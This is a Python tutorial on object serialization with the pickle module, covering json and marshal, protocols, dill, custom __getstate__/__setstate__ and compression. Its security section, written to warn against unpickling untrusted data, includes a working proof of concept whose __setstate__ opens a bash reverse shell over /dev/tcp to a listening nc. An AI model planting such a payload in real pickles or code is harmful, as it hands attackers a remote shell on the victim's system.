The Python pickle Module: How to Persist Objects in Python

by Davide Mastromatteo Apr 27, 2020 intermediate python

As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python pickle module.

In this tutorial, you’ll learn:

  • What it means to serialize and deserialize an object
  • Which modules you can use to serialize objects in Python
  • Which kinds of objects can be serialized with the Python pickle module
  • How to use the Python pickle module to serialize object hierarchies
  • What the risks are when deserializing an object from an untrusted source

Let’s get pickling!

Serialization in Python

The serialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.

In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as marshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called deserialization or unmarshalling.

Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.

Python offers three different modules in the standard library that allow you to serialize and deserialize objects:

  1. The marshal module
  2. The json module
  3. The pickle module

In addition, Python supports XML, which you can also use to serialize objects.

The marshal module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the .pyc files you get when the interpreter imports a Python module. So, even though you can use marshal to serialize some of your objects, it’s not recommended.

The json module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.

There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the json module, you can serialize and deserialize several standard Python types, including dict, list, tuple, str, int, float, bool, and None.
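As a minimal sketch of a JSON round trip, the snippet below serializes a dictionary built only from types that json understands. The record variable and its contents are made up for illustration. Note that JSON has no tuple type, so a tuple comes back as a list:

```python
import json

# A structure built only from types that the json module understands.
record = {
    "name": "pickle",
    "versions": (0, 1, 2),  # a tuple; JSON has no tuple type
    "stable": True,
    "maintainer": None,
    "ratio": 0.5,
}

encoded = json.dumps(record)   # the result is a str, not bytes
decoded = json.loads(encoded)

print(encoded)
print(decoded["versions"])     # the tuple is restored as a list
```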

The Python pickle module is another way to serialize and deserialize objects in Python. It differs from the json module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.
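To make the difference concrete, here’s a small sketch that feeds the same dictionary to both modules. The data is invented for illustration and deliberately contains a date, a set, and a bytes object, none of which json can encode without extra help:

```python
import datetime
import json
import pickle

# Illustrative data with types that json can't encode out of the box.
data = {
    "published": datetime.date(2020, 4, 27),
    "tags": {"python", "pickle"},
    "payload": b"\x00\x01",
}

try:
    json.dumps(data)
    json_ok = True
except TypeError as exc:
    json_ok = False
    print(f"json.dumps() failed: {exc}")

# pickle handles the same structure without any customization.
restored = pickle.loads(pickle.dumps(data))
print(restored == data)
```

You can teach json about extra types with a custom encoder, but that’s additional work that pickle doesn’t require.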

So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.

Here are three general guidelines for deciding which approach to use:

  1. Don’t use the marshal module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.

  2. The json module and XML are good choices if you need interoperability with different languages or a human-readable format.

  3. The Python pickle module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with pickle.

Inside the Python pickle Module

The Python pickle module basically consists of four functions:

  1. pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
  2. pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
  3. pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
  4. pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)

The first two functions are used during the pickling process, and the other two are used during unpickling. The only difference between dump() and dumps() is that the first writes the serialization result to a file, whereas the second returns it as a bytes object.

To differentiate dumps() from dump(), it’s helpful to remember that the s at the end of the function name stands for string, even though in Python 3 the result is a bytes object rather than a str. The same concept also applies to load() and loads(): The first one reads a file to start the unpickling process, and the second one operates on a bytes object.
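The following sketch puts the two pairs of functions side by side. The data, the temporary directory, and the data.pkl file name are arbitrary choices made for this illustration:

```python
import os
import pickle
import tempfile

data = {"a_number": 35, "a_list": [1, 2, 3]}

# dumps() returns the serialized result as a bytes object,
# and loads() rebuilds the object from those bytes.
as_bytes = pickle.dumps(data)
from_bytes = pickle.loads(as_bytes)

# dump() writes the serialized result to a file opened in binary mode,
# and load() reads it back from such a file.
with tempfile.TemporaryDirectory() as tmp_dir:
    path = os.path.join(tmp_dir, "data.pkl")
    with open(path, "wb") as file:
        pickle.dump(data, file)
    with open(path, "rb") as file:
        from_file = pickle.load(file)

print(type(as_bytes).__name__)
print(from_bytes == from_file == data)
```

Remember to open the file in binary mode ("wb" and "rb"), since pickled data is bytes rather than text.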

Consider the following example. Say you have a custom-defined class named example_class with several different attributes, each of a different type:

  • a_number
  • a_string
  • a_dict
  • a_list
  • a_tuple

The example below shows how you can instantiate the class and pickle the instance to get a bytes object. After pickling the instance, you can change the value of its attributes without affecting the pickled bytes. You can then unpickle the bytes into another variable, restoring a copy of the previously pickled instance:

# pickling.py
import pickle

class example_class:
    a_number = 35
    a_string = "hey"
    a_list = [1, 2, 3]
    a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
    a_tuple = (22, 23)

my_object = example_class()

my_pickled_object = pickle.dumps(my_object)  # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")

my_object.a_dict = None

my_unpickled_object = pickle.loads(my_pickled_object)  # Unpickling the object
print(
    f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")

In the example above, you create an instance of example_class and serialize it with pickle. This produces a single bytes object with the serialized result:

$ python pickling.py
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'

This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}

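The pickling process ends correctly, storing a representation of your instance in this bytes object: b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.' After the pickling process ends, you modify your original object by setting the attribute a_dict to None.

Finally, you unpickle the bytes into a completely new instance, which is unaffected by the change to the original. Note that the pickled bytes contain only a reference to example_class: because the attributes in this example are defined on the class rather than on the instance, there’s no instance state to store, and the new instance reads a_dict from the class. When attributes are set on the instance, pickle stores them, and unpickling gives you a deep copy of the object structure from the time that the pickling process began.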
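One detail worth knowing is that pickle stores an instance’s own attributes (its __dict__), while attributes defined in the class body are looked up on the class again after unpickling. The sketch below uses a hypothetical class named Example that sets its attributes in __init__(), so the state really is embedded in the pickled bytes and the restored object is independent of later changes to the original:

```python
import pickle


class Example:
    """Hypothetical class whose attributes live on the instance."""

    def __init__(self):
        self.a_number = 35
        self.a_dict = {"first": "a", "third": [1, 2, 3]}


original = Example()
pickled = pickle.dumps(original)

# Mutate the original after pickling, including a nested list.
original.a_dict["third"].append(4)
original.a_number = 0

restored = pickle.loads(pickled)
print(restored.a_number)           # 35
print(restored.a_dict["third"])    # [1, 2, 3]
print(b"a_number" in pickled)      # True: the attribute name is in the bytes
```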

Protocol Formats of the Python pickle Module

Unlike JSON or XML, the pickle format is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the pickle module has evolved over time.

This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.

There are currently six different protocols that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.

  1. Protocol version 0 was the first version. Unlike later protocols, it’s human readable.
  2. Protocol version 1 was the first binary format.
  3. Protocol version 2 was introduced in Python 2.3.
  4. Protocol version 3 was added in Python 3.0. It can’t be unpickled by Python 2.x.
  5. Protocol version 4 was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.
  6. Protocol version 5 was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data.

To choose a specific protocol, you need to specify the protocol version when you invoke dump() or dumps(). You don’t need to specify it for load() or loads() because the protocol is detected automatically from the pickled data. If you don’t specify a protocol, then your interpreter will use the default version specified in the pickle.DEFAULT_PROTOCOL attribute.
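Here’s a short sketch of how protocol selection looks in practice. The data is arbitrary, and the values printed for the default and highest protocols depend on your Python version:

```python
import pickle

data = {"numbers": [1, 2, 3]}

# These values depend on the interpreter that runs the code.
print(pickle.DEFAULT_PROTOCOL, pickle.HIGHEST_PROTOCOL)

# The protocol is chosen when pickling.
oldest = pickle.dumps(data, protocol=0)
newest = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)

# Protocol 0 output is printable text. Protocols 2 and later start
# with the byte 0x80 followed by the protocol number.
print(oldest)
print(newest[:2])

# loads() takes no protocol argument and works with either result.
print(pickle.loads(oldest) == pickle.loads(newest) == data)
```

If the pickle has to be read by an older interpreter, pass the highest protocol that interpreter supports instead of pickle.HIGHEST_PROTOCOL.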

Picklable and Unpicklable Types

You’ve already learned that the Python pickle module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.
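As a quick illustration, the sketch below tries to pickle a threading.Lock, which is one of the objects that pickle refuses to serialize. The lock stands in for any resource that’s tied to the running process:

```python
import pickle
import threading

lock = threading.Lock()

try:
    pickle.dumps(lock)
    error = None
except TypeError as exc:
    # pickle raises TypeError for objects it can't serialize.
    error = exc

print(f"Pickling failed: {error}")
```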

If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as dill.

The dill module extends the capabilities of pickle. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others.

To test this module, you can try to pickle a lambda function:

# pickling_error.py
import pickle

square = lambda x : x * x
my_pickle = pickle.dumps(square)

If you try to run this program, then you will get an exception because the Python pickle module can’t serialize a lambda function:

$ python pickling_error.py
Traceback (most recent call last):
  File "pickling_error.py", line 6, in <module>
    my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed

Now try replacing the Python pickle module with dill to see if there’s any difference:

# pickling_dill.py
import dill

square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)

If you run this code, then you’ll see that the dill module serializes the lambda without returning an error:

$ python pickling_dill.py
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'

Another interesting feature of dill is that it can even serialize an entire interpreter session. Here’s an example:

>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()

In this example, you start the interpreter, import a module, and define a lambda function along with a couple of other variables. You then import the dill module and invoke dump_session() to serialize the entire session.

If everything goes okay, then you should get a test.pkl file in your current directory:

$ ls test.pkl
4 -rw-r--r--@ 1 dave  staff  439 Feb  3 10:52 test.pkl

Now you can start a new instance of the interpreter and load the test.pkl file to restore your last session:

>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>

The first globals().items() statement demonstrates that the interpreter is in the initial state. This means that you need to import the dill module and call load_session() to restore your serialized interpreter session.

Even though dill lets you serialize a wider range of objects than pickle, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for dill.

So, how can you solve this problem?

The solution in this case is to exclude the object from the serialization process and to reinitialize the connection after the object is deserialized.

You can use __getstate__() to define what should be included in the pickling process. If you don’t override __getstate__(), then the instance’s __dict__ is used by default.

In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with __getstate__():

# custom_pickling.py

import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)

print(my_new_instance.__dict__)

In this example, you create an object with three attributes. Since one attribute is a lambda, the object is unpicklable with the standard pickle module.

To address this issue, you specify what to pickle with __getstate__(). You first clone the entire __dict__ of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable c attribute.

If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the c attribute:

$ python custom_pickling.py
{'a': 35, 'b': 'test'}

But what if you wanted to do some additional initializations while unpickling, say by adding the excluded c object back to the deserialized instance? You can accomplish this with __setstate__():

# custom_unpickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

    def __setstate__(self, state):
        self.__dict__ = state
        self.c = lambda x: x * x

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)

By recreating the excluded c attribute inside __setstate__(), you ensure that it appears in the __dict__ of the unpickled instance.
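The same pattern applies to the database connection scenario mentioned earlier. The following is a minimal sketch, assuming a hypothetical Repository class that wraps a sqlite3 connection: the connection is left out of the pickle and reopened from the stored settings during unpickling.

```python
import pickle
import sqlite3


class Repository:
    """Hypothetical class that owns an unpicklable database connection."""

    def __init__(self, database=":memory:"):
        self.database = database
        self.connection = sqlite3.connect(database)

    def __getstate__(self):
        state = self.__dict__.copy()
        del state["connection"]  # leave the live connection out of the pickle
        return state

    def __setstate__(self, state):
        self.__dict__.update(state)
        # Reopen the connection from the stored settings.
        self.connection = sqlite3.connect(self.database)


repo = Repository()
restored = pickle.loads(pickle.dumps(repo))

row = restored.connection.execute("SELECT 1").fetchone()
print(restored.database)
print(row)

repo.connection.close()
restored.connection.close()
```

Only the connection settings travel with the pickle. With an in-memory database like the one used here, the restored object gets a fresh, empty database, so this approach makes the most sense when the data lives in a file or on a server.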

Compression of Pickled Objects

Although the pickle data format is a compact binary representation of an object structure, you can still optimize your pickled data by compressing it with bzip2 or gzip.

To compress pickled data with bzip2, you can use the bz2 module provided in the standard library.

In the following example, you’ll take a string, pickle it, and then compress it using the bz2 library:

>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259

When using compression, bear in mind that smaller files come at the cost of a slower process.
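To judge what compression buys you, it helps to compare the compressed size with the size of the pickled bytes and to confirm that the data survives the round trip. The sketch below does this with both bz2 and gzip. The list of records is invented for illustration, and the exact sizes depend on your data and Python version:

```python
import bz2
import gzip
import pickle

# Illustrative, repetitive data that compresses well.
data = [{"id": i, "name": f"item-{i}"} for i in range(1000)]

pickled = pickle.dumps(data)
compressed_bz2 = bz2.compress(pickled)
compressed_gzip = gzip.compress(pickled)

print(len(pickled), len(compressed_bz2), len(compressed_gzip))

# Decompress before unpickling to get the original data back.
restored = pickle.loads(bz2.decompress(compressed_bz2))
print(restored == data)
```

Very small payloads can end up larger after compression because of the format’s fixed overhead, so it’s worth measuring with data that resembles your own.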

Security Concerns With the Python pickle Module

You now know how to use the pickle module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.

However, there’s one more thing you need to know about the Python pickle module: It’s not secure. Do you remember the discussion of __setstate__()? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!

So, what can you do to reduce this risk?

Sadly, not much. The rule of thumb is to never unpickle data that comes from an untrusted source or is transmitted over an insecure network. To guard against man-in-the-middle attacks, it’s a good idea to sign the data with a module such as hmac so that you can verify it hasn’t been tampered with.
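One way to apply the signing idea is sketched below. It assumes that the sender and the receiver already share a secret key, and the names SECRET_KEY, sign(), and verify_and_load() are hypothetical helpers written for this illustration, not part of pickle or hmac:

```python
import hashlib
import hmac
import pickle

# Assumption: both sides already share this key over a secure channel.
SECRET_KEY = b"replace-with-a-real-secret"


def sign(payload: bytes) -> bytes:
    """Return the HMAC-SHA256 digest followed by the payload."""
    digest = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return digest + payload


def verify_and_load(message: bytes):
    """Unpickle the payload only if its signature matches."""
    digest, payload = message[:32], message[32:]  # SHA-256 digests are 32 bytes
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(digest, expected):
        raise ValueError("signature mismatch: refusing to unpickle")
    return pickle.loads(payload)


message = sign(pickle.dumps({"user": "dave", "admin": False}))
print(verify_and_load(message))

# Flip one bit of the payload to simulate tampering in transit.
tampered = message[:-1] + bytes([message[-1] ^ 0x01])
try:
    verify_and_load(tampered)
except ValueError as exc:
    print(exc)
```

A valid signature only tells you that the data was produced by someone who holds the key and wasn’t modified afterward. It doesn’t make unpickling safe if the key holder itself can’t be trusted.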

The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:

# remote.py
import pickle
import os

class foobar:
    def __init__(self):
        pass

    def __getstate__(self):
        return self.__dict__

    def __setstate__(self, state):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c '
                  '"/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')


my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)

In this example, the unpickling process executes __setstate__(), which executes a Bash command to open a remote shell to the 192.168.1.10 machine on port 8080.

Here’s how you can safely test this script on your Mac or your Linux box. First, open the terminal and use the nc command to listen for a connection to port 8080:

$ nc -l 8080

This will be the attacker terminal. If everything works, then the command will seem to hang.

Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change the IP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is 192.168.1.10.

By executing this code, the victim will expose a shell to the attacker:

$ python remote.py

If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:

$ nc -l 8080
bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$

So, let me repeat this critical point once again: Do not use the pickle module to deserialize objects from untrusted sources!

Conclusion

You now know how to use the Python pickle module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.

In this tutorial, you’ve learned:

  • What it means to serialize and deserialize an object
  • Which modules you can use to serialize objects in Python
  • Which kinds of objects can be serialized with the Python pickle module
  • How to use the Python pickle module to serialize object hierarchies
  • What the risks are of unpickling from an untrusted source

With this knowledge, you’re well equipped to persist your objects using the Python pickle module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.

If you have any questions, then leave a comment down below or contact me on Twitter!
